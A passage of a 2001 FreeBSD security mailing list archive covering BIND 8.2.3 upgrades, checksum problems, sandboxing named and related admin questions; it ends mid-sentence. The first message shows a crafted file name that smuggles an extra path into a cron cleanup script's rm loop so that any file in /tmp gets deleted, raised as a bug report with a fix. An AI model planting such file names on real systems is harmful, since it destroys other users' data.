"unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:21:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 5A97837B6B5 for ; Tue, 30 Jan 2001 02:21:23 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 14NXuV-0000B8-00; Tue, 30 Jan 2001 12:21:15 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id MAA17166; Tue, 30 Jan 2001 12:21:13 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 16961; Tue Jan 30 12:20:43 2001 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.20 #1) id 14NXty-00023O-00; Tue, 30 Jan 2001 12:20:42 +0200 From: Sheldon Hearn To: Stu Pidaso Cc: "Jacques A. Vidrine" , freebsd-security@freebsd.org Subject: Re: cvs commit: src/usr.bin/login login.c In-reply-to: Your message of "Tue, 30 Jan 2001 05:08:09 EST." Date: Tue, 30 Jan 2001 12:20:42 +0200 Message-ID: <7897.980850042@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jan 2001 05:08:09 EST, Stu Pidaso wrote: > > # Destroy all stale Kerberos5 tickets > > # > > for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do > > rm -f $i > > done > > and now you can delete you can delete any file in /tmp. > > touch 'krb5cc_1 somefileintmp' and wait. Well spotted. find /tmp -name 'krb5cc_*' -ctime +1 -exec rm -f {} \; I don't use -delete because it's not portable. Of course, the problem is that maximum ticket lifetime is a site- configurable value, which is why it _doesn't_ make sense to put this job in /etc/crontab in the base system. The problem is that you can end up with a large number of stale files in /tmp if you rely on users to run kdestroy religiously. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:22:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from orhi.sarenet.es (orhi.sarenet.es [192.148.167.5]) by hub.freebsd.org (Postfix) with ESMTP id 77DC737B6B7 for ; Tue, 30 Jan 2001 02:22:04 -0800 (PST) Received: from sarenet.es (borja.sarenet.es [192.148.167.77]) by orhi.sarenet.es (Postfix) with ESMTP id 9B7DB4A1D for ; Tue, 30 Jan 2001 11:22:00 +0100 (MET) Message-ID: <3A7695CB.7E2F7CBB@sarenet.es> Date: Tue, 30 Jan 2001 11:22:03 +0100 From: Borja Marcos X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: More bind8 ports problems Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, After installing the port (getting the correct files from ftp.isc.org), I have seen a problem: After I modify /etc/rc.conf so to use /usr/local/sbin/named, whenever I run "ndc restart" (using /usr/local/sbin/ndc), the server doesn't restart, as it is looking for named.conf in /etc. Wouldn't it be better to build it with DESTETC=/etc/namebd, so that it is easier to replace it? Another problem: I have tried to run named as a "bind" user, but if I restart it with ndc, the new named runs as "root". Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:24: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 771DE37B6B8 for ; Tue, 30 Jan 2001 02:23:41 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id XAA59099; Tue, 30 Jan 2001 23:23:10 +1300 (NZDT) Message-Id: <200101301023.XAA59099@ducky.nz.freebsd.org> From: "Dan Langille" Organization: The FreeBSD Diary / FreshPorts To: Kris Kennaway Date: Tue, 30 Jan 2001 23:23:07 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: Justin Stanford , cjclark@alum.mit.edu, security@FreeBSD.ORG In-reply-to: <20010130021928.A47944@xor.obsecurity.org> References: ; from alex@wnm.net on Tue, Jan 30, 2001 at 04:12:11AM -0600 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 2:19, Kris Kennaway wrote: > On Tue, Jan 30, 2001 at 04:12:11AM -0600, Alex Charalabidis wrote: > > > >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. > > Receiving bind-src.tar.gz (1256951 bytes): 14%C > > > > Conclusion: Distfiles have not been updated and ftp.freebsd.org > > still carries P7. There's your checksum mismatch. > > Ah yes, if you have old copies of the distfiles in your > /usr/ports/distfiles they'll be used instead of fetching new ones, > since the filename is the same. Remove them and let the port download > fresh ones. > > rm /usr/ports/distfiles/bind-src.tar.gz /usr/ports/distfiles/bind-doc.tar.gz I didn't have the tarballs (they were removed previously). The fetch/extract port worked for me. Will report later on the build, I'm off to bed now. -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:26:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 4C83837B6B1 for ; Tue, 30 Jan 2001 02:26:03 -0800 (PST) Received: (from root@localhost) by earth.wnm.net (8.11.0/8.11.0) id f0UAQ5V34550; Tue, 30 Jan 2001 04:26:05 -0600 (CST) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0av) with ESMTP id f0UAQ4M34541; Tue, 30 Jan 2001 04:26:04 -0600 (CST) X-Authentication-Warning: earth.wnm.net: alex owned process doing -bs Date: Tue, 30 Jan 2001 04:26:03 -0600 (CST) From: Alex Charalabidis To: Borja Marcos Cc: freebsd-security@freebsd.org Subject: Re: More bind8 ports problems In-Reply-To: <3A7695CB.7E2F7CBB@sarenet.es> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jan 2001, Borja Marcos wrote: > > Hello, > > After installing the port (getting the correct files from > ftp.isc.org), I have seen a problem: > > After I modify /etc/rc.conf so to use /usr/local/sbin/named, > whenever I run "ndc restart" (using /usr/local/sbin/ndc), the > server doesn't restart, as it is looking for named.conf in > /etc. Wouldn't it be better to build it with DESTETC=/etc/namebd, > so that it is easier to replace it? > Don't use ndc restart with a version change. Do ndc stop and launch it manually. > Another problem: I have tried to run named as a "bind" > user, but if I restart it with ndc, the new named runs as "root". > Bad ndc behaviour. Wish I had a fix for it but haven't given it enough thought. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 System Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:31:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 6E9E237B6C1 for ; Tue, 30 Jan 2001 02:31:01 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id BABEFBA2B4; Tue, 30 Jan 2001 02:31:31 -0800 (PST) Date: Tue, 30 Jan 2001 02:31:31 -0800 From: Kris Kennaway To: Borja Marcos Cc: freebsd-security@FreeBSD.ORG Subject: Re: More bind8 ports problems Message-ID: <20010130023131.A50095@xor.obsecurity.org> References: <3A7695CB.7E2F7CBB@sarenet.es> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="5mCyUwZo2JvN/JJP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A7695CB.7E2F7CBB@sarenet.es>; from borjamar@sarenet.es on Tue, Jan 30, 2001 at 11:22:03AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --5mCyUwZo2JvN/JJP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 11:22:03AM +0100, Borja Marcos wrote: > After I modify /etc/rc.conf so to use /usr/local/sbin/named, > whenever I run "ndc restart" (using /usr/local/sbin/ndc), the > server doesn't restart, as it is looking for named.conf in > /etc. Wouldn't it be better to build it with DESTETC=/etc/namebd, > so that it is easier to replace it? Looks like that's where the port has always expected to find the config file. It does depart from the usual ports convention of locating config files in $PREFIX/etc, but OTOH it's in line with how people usually expect BIND to work. > Another problem: I have tried to run named as a "bind" > user, but if I restart it with ndc, the new named runs as "root". Don't know there. Kris --5mCyUwZo2JvN/JJP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpgDWry0BWjoQKURAoIvAJ4yqGCbYUpE0/tIKz+fWRRAykYMjgCdEpI7 QmwvXIUd//6h2br8Sa9q1hc= =5VRK -----END PGP SIGNATURE----- --5mCyUwZo2JvN/JJP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:40:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id 9CBD337B6C5; Tue, 30 Jan 2001 02:39:47 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id KAA03052; Tue, 30 Jan 2001 10:43:21 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Tue, 30 Jan 2001 12:43:16 +0200 (SAST) From: Justin Stanford X-Sender: jus@athena.za.net To: Kris Kennaway Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: /usr/ports/net/bind8 failing checksums? In-Reply-To: <20010130023452.B50228@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Right, it works with the src files from isc's ftp - I had just assumed that with a port update ftp.freebsd.org's distfiles would be updated aswell. With PREFIX=/usr and DESTECT=/etc it works perfectly as a seamless drop in. Regards, Justin -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions On Tue, 30 Jan 2001, Kris Kennaway wrote: > On Tue, Jan 30, 2001 at 10:06:11AM +0200, Justin Stanford wrote: > > ===> Extracting for bind-8.2.3 > > >> Checksum mismatch for bind-src.tar.gz. > > >> Checksum mismatch for bind-doc.tar.gz. > > > > I've just cvsupped a fresh bind8 port from cvsup.freebsd.org and > > downloaded the distfiles from ftp.freebsd.org - what's up with that? > > Remove your out of date distfiles and download the new versions - they > have the same name as the old ones. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:51: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 1D54A37B6C7; Tue, 30 Jan 2001 02:50:46 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id XAA60705; Tue, 30 Jan 2001 23:50:34 +1300 (NZDT) Message-Id: <200101301050.XAA60705@ducky.nz.freebsd.org> From: "Dan Langille" Organization: The FreeBSD Diary / FreshPorts To: Justin Stanford Date: Tue, 30 Jan 2001 23:50:31 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: /usr/ports/net/bind8 failing checksums? Reply-To: dan@langille.org Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG References: <20010130023452.B50228@xor.obsecurity.org> In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 12:43, Justin Stanford wrote: > Right, it works with the src files from isc's ftp - I had just assumed > that with a port update ftp.freebsd.org's distfiles would be updated > aswell. With PREFIX=/usr and DESTECT=/etc it works perfectly as a seamless > drop in. Just in case someone else tries that, should that be DESTETC? -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:52:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id E6D3137B6C7; Tue, 30 Jan 2001 02:51:56 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id KAA03076; Tue, 30 Jan 2001 10:55:32 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Tue, 30 Jan 2001 12:55:27 +0200 (SAST) From: Justin Stanford X-Sender: jus@athena.za.net To: Dan Langille Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: /usr/ports/net/bind8 failing checksums? In-Reply-To: <200101301050.XAA60705@ducky.nz.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Typo - thanks for the correction ;-) -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions On Tue, 30 Jan 2001, Dan Langille wrote: > On 30 Jan 2001, at 12:43, Justin Stanford wrote: > > > Right, it works with the src files from isc's ftp - I had just assumed > > that with a port update ftp.freebsd.org's distfiles would be updated > > aswell. With PREFIX=/usr and DESTECT=/etc it works perfectly as a seamless > > drop in. > > Just in case someone else tries that, should that be DESTETC? > > -- > Dan Langille > pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 3:11: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 03AB637B503 for ; Tue, 30 Jan 2001 03:10:40 -0800 (PST) Received: (qmail 4414 invoked by uid 1000); 30 Jan 2001 11:09:03 -0000 Date: Tue, 30 Jan 2001 13:09:03 +0200 From: Peter Pentchev To: disassembled Cc: freebsd-security@FreeBSD.ORG Subject: Re: mapping arp Message-ID: <20010130130903.E328@ringworld.oblivion.bg> Mail-Followup-To: disassembled , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from modulus@icmp.dhs.org on Mon, Jan 29, 2001 at 09:14:27PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 29, 2001 at 09:14:27PM -0600, disassembled wrote: > > I was wondering if there was anyway i could map an mac address back > to it's assigned IP address without using a rarpd. > > something i was considering writing was using writing a program > that sent out a series of arp who-has packets to the network > then run a cmp on the 48-bit values that returned in the > replies against some mac address that would be supplied on the > command line. > > if anyone knows anything about that & could help me out; > i would be greatful. If your system has already seen IP traffic from the machine in question, you should have its address in the kernel's ARP cache. arp -an should display it, or you could query it the way arp(1) does. G'luck, Peter -- I am the thought you are now thinking. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 3:39: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id DA24A37B6A3 for ; Tue, 30 Jan 2001 03:38:40 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id AAA64905; Wed, 31 Jan 2001 00:38:34 +1300 (NZDT) Message-Id: <200101301138.AAA64905@ducky.nz.freebsd.org> From: "Dan Langille" Organization: novice in training To: "Crist J. Clark" Date: Wed, 31 Jan 2001 00:38:28 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG In-reply-to: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> References: <200101300712.UAA56104@ducky.nz.freebsd.org>; from dan@langille.org on Tue, Jan 30, 2001 at 08:12:21PM +1300 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 1:26, Crist J. Clark wrote: > > It can't be that simple! > > I hate to break it to you (I guess?), but it is. I did it on my > CURRENT box for testing and it clobbered the old BIND quite nicely. > Before, > > bubbles# ls -l /usr/sbin/named > -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named > > After, > > bubbles# !ls > ls -l /usr/sbin/named > -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named > > Like I said, PREFIX rocks. I actually tried: make PREFIX=/usr DESTETC=/etc install The only catch was needing to have /etc/name.conf, so I created a symlink: # ln -s /etc/named.conf /etc/namedb/named.conf I'll do more testing in the morning.... -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 5:20:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C877437B6AB for ; Tue, 30 Jan 2001 05:20:15 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA20171; Tue, 30 Jan 2001 14:20:13 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Kris Kennaway Cc: security@FreeBSD.ORG Subject: BIND 8.2.3 upgrade instructions for RELENG_3 and older systems References: <20010129143300.A38419@xor.obsecurity.org> From: Dag-Erling Smorgrav Date: 30 Jan 2001 14:20:13 +0100 In-Reply-To: Kris Kennaway's message of "Mon, 29 Jan 2001 14:33:00 -0800" Message-ID: Lines: 193 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway writes: > Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be > updated tomorrow). Some of the cvsup mirrors may take a little while > to receive the update though, so be warned. They should all have it in > an hour or so. RELENG_3 has been fixed, please follow the procedure below if you're running 2.2.x or 3.x (tested on 3.5-STABLE, should work on 2.2.x but no guarantees): 1) start by updating the following directories to the latest RELENG_3, either using cvsup or using 'cvs update -Pd -rRELENG_3' if you have access to a CVS repository. src/contrib/bind src/lib/libbind src/lib/libisc src/libexec/named-xfer src/usr.sbin/named src/usr.sbin/named.reload src/usr.sbin/named.restart src/usr.sbin/ndc make sure you have src/contrib/bind/port/freebsd/include/port_after.h revision 1.3.2.3 if you're running a pre-IPv6 version of FreeBSD (2.2.x or 3.x). 2) (OPTIONAL) if you are planning to run BIND in a sandbox, apply the following patch to src/libexec/named-xfer/Makefile: @@ -23,4 +23,6 @@ MAN8= named-xfer.8 +NOSHARED= YES + .include # END OF PATCH 3) in each if the directories listed above *except src/contrib/bind* and *in the order listed*, run the following command: make cleandir && make obj && make depend && make && make install 4) restart your name server. !!!WARNING!!! If you are running BIND with particular options (e.g. to run it in a chroot or jail) DO NOT USE 'ndc restart' UNLESS YOU ALSO PROVIDE THOSE OPTIONS ON THE NDC COMMAND LINE - e.g. 'ndc restart -t /foo' Assuming rc.conf has the right information (which it must have if BIND is to start correctly after a reboot), you can use the following script to restart BIND: #!/bin/sh if [ -f /etc/defaults/rc.conf ] ; then . /etc/defaults/rc.conf fi if [ -n "${source_rc_confs_defined}" ] ; then source_rc_confs elif [ -f /etc/rc.conf ] ; then . /etc/rc.conf else echo "Where's your configuration?" exit 1 fi killall -KILL named ${named_program:-named} ${named_flags} # END OF SCRIPT 5) Instructions for running BIND in a chroot sandbox a) Make sure your system has a 'bind' user like this: bind:*:53:53::0:0:Bind Sandbox:/home/bind:/sbin/nologin b) Make sure your system has a 'bind' group like this: bind:*:53: c) Pick a location for your sandbox; /home/bind is as good a place as any. d) Create all necessary directories mkdir -p /home/bind/etc/namedb mkdir -p /home/bind/usr/libexec mkdir -p /home/bind/var/run mkdir -p /home/bind/var/tmp e) Copy named-xfer into the sandbox cp /usr/libexec/named-xfer /home/bind/usr/libexec This assumes you built a statically linked named-xfer (see above). f) Copy your config files etc. into /home/bind/etc/namedb. If you like to have your master and/or slave zone files in separate subdirectories of etc/namedb, create those; I like to put master zones in etc/namedb/master, slave zones in etc/namedb/slave, and dumps in etc/namedb/db. You shouldn't need any sandbox-specific magic in your named.conf - the stock config should be fine, though I would recommend specifying a listen address and a query-source. The options section for a simple config, assuming your server's IP address is 192.168.0.1, would look like this: options { directory "/etc/namedb"; forwarders { // the usual stuff - your ISP's name servers, // those of a few other large ISPs in your country, // or whatever you like to forward queries to }; listen-on port 53 { 192.168.0.1; }; query-source address 192.168.0.1 port 53; } You don't need to listen on 127.0.0.1; just make sure your /etc/resolv.conf points to 192.168.0.1 instead of 127.0.0.1. g) Fix permissions: chown -R bind:bind /home/bind chmod -R o-rwx /home/bind h) Set up an extra log socket inside the sandbox so BIND can access syslogd: add "-l /home/bind/var/run/log" to your syslogd_flags in your /etc/rc.conf, and restart syslogds with the correct flags, like this: (. /etc/rc.conf ; syslogd "${syslogd_flags}") Verify that /home/bind/var/run/log exists and is a socket after restarting syslogd. i) Set up a symlink to the real ndc socket so ndc will still work: ln -fs /home/bind/var/run/ndc /var/run You may want to do the same for the named.pid file, though there's no real need to. j) Add the right options to named_flags in your /etc/rc.conf - if you followed these instructions to the letter, the right options would be "-ubind -gbind -t/home/bind" k) Use the restart script above to start named. Verify that it works. If it doesn't, check /var/log/messages and fix whatever errors it reports. 6) Instructions for running BIND in a jail sandbox There are two possibilities here: use the jail(8) command, or patch BIND so it can jail itself. Note that this only works on RELENG_4 and newer, since older FreeBSD versions don't have jail support. a) using jail(8): follow the instructions in 5) above, except that your sandbox should contain a statically linked copy of named(8) in usr/sbin, and instead of step j) you should just set named_program in /etc/rc.conf to the following: "/usr/sbin/jail /home/bind ns.domain.com 192.168.0.1 /usr/sbin/bind" you can also set named_flags to "-ubind -gbind", but in that case you need password and group files in your sandbox's etc directory so BIND can figure out which user and group to use. b) patching BIND: get the BIND patch from my software page: apply the patch, and follow the instructions provided earlier in this document for rebuilding BIND (you only need to rebuild src/usr.sbin/named). Next, follow the instructions for running BIND in a chroot sandbox, except that in step j) you should use the following options: "-ubind -gbind -hns1.domain.com -i192.168.0.1 -j/home/bind" There is no need to place a named binary in the sandbox. That's it, folks! DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 5:28:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F115B37B4EC for ; Tue, 30 Jan 2001 05:28:15 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA20197; Tue, 30 Jan 2001 14:28:14 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Kris Kennaway Cc: Borja Marcos , freebsd-security@freebsd.org Subject: Re: More bind8 ports problems References: <3A7695CB.7E2F7CBB@sarenet.es> <20010130023131.A50095@xor.obsecurity.org> From: Dag-Erling Smorgrav Date: 30 Jan 2001 14:28:13 +0100 In-Reply-To: Kris Kennaway's message of "Tue, 30 Jan 2001 02:31:31 -0800" Message-ID: Lines: 31 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway writes: > On Tue, Jan 30, 2001 at 11:22:03AM +0100, Borja Marcos wrote: > > Another problem: I have tried to run named as a "bind" > > user, but if I restart it with ndc, the new named runs as "root". > Don't know there. 'ndc restart' restarts named with no arguments, unless you pass them with the 'restart' command: # ndc restart -ubind -gbind -t/home/bind Use the following script instead: #!/bin/sh if [ -f /etc/defaults/rc.conf ] ; then . /etc/defaults/rc.conf fi if [ -n "${source_rc_confs_defined}" ] ; then source_rc_confs elif [ -f /etc/rc.conf ] ; then . /etc/rc.conf else echo "Where's your configuration?" exit 1 fi killall -KILL named ${named_program:-named} ${named_flags} DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 7:10:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from garnet.INS.CWRU.Edu (garnet.INS.CWRU.Edu [129.22.8.233]) by hub.freebsd.org (Postfix) with ESMTP id 0D11037B65D; Tue, 30 Jan 2001 07:09:54 -0800 (PST) Received: from nike.INS.CWRU.Edu (nike.INS.CWRU.Edu [129.22.8.219]) by garnet.INS.CWRU.Edu with SMTP (8.8.8+cwru/CWRU-3.6) id KAA24833; Tue, 30 Jan 2001 10:09:41 -0500 (EST) (from chet@nike.INS.CWRU.Edu) Date: Tue, 30 Jan 2001 10:06:09 -0500 From: Chet Ramey To: roam@orbitel.bg Subject: Re: Bash2 removes SSH_CLIENT from the environment Cc: patrick@netzuno.com, freebsd-hackers@freebsd.org, freebsd-security@freebsd.org, chet@po.cwru.edu Reply-To: chet@po.CWRU.Edu Message-ID: <1010130150609.AA70020.SM@nike.INS.CWRU.Edu> Read-Receipt-To: chet@po.CWRU.Edu MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-In-Reply-To: Message from roam@orbitel.bg of Tue, 30 Jan 2001 10:34:16 +0200 (id <20010130103415.B328@ringworld.oblivion.bg>) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > However I found that if the login shell of the user is set to bash (version > > 2.03 or 2.04 at least), this variable is never set. Upon inspection of the > > code for bash, it appears that bash is explicitely removing the definition > > of this environment variable. Would anybody have an idea why ??? > > > > Also the fix to leave SSH_CLIENT defined is trivial, is that something that > > would be desirable for the bash2 port ? > > Huh? Bash uses the presence of SSH_CLIENT to decide whether or not to run the shell startup files for a non-interactive shell (like it attempts to do for rsh). The problem is that if the variable is exported, subsequent invocations of non-interactive shells will source the startup files. A lot of users find the former behavior desirable, and the latter undesirable. The tradeoff bash makes is to remove the export attribute from SSH_CLIENT if it exists in the shell's initial environment. Users may always export it explicitly. Chet -- ``The lyf so short, the craft so long to lerne.'' - Chaucer ( ``Discere est Dolere'' -- chet) Chet Ramey, CWRU chet@po.CWRU.Edu http://cnswww.cns.cwru.edu/~chet/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 8: 1:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (lc4-lfd11.law5.hotmail.com [216.32.243.33]) by hub.freebsd.org (Postfix) with ESMTP id 6D1F537B503 for ; Tue, 30 Jan 2001 08:01:13 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 30 Jan 2001 08:01:13 -0800 Received: from 192.122.209.42 by www.hotmail.msn.com with HTTP; Tue, 30 Jan 2001 16:01:12 GMT X-Originating-IP: [192.122.209.42] From: "Edward W. M." To: freebsd-security@FreeBSD.ORG Subject: POP3 / IMAP security Date: Tue, 30 Jan 2001 08:01:12 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 30 Jan 2001 16:01:13.0137 (UTC) FILETIME=[DE76D210:01C08AD5] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi everyone, I apologize in advance if you feel that I should have posted this to questions. I intend to run POP and IMAP services on a new machine, so I need easily deployable secure servers that can be installed from the ports. Cyrus is out of the question for me, I am running that on another box and I just need something more easily deployable for this one. All my users have shell access and log in via ssh, so the bugs in the 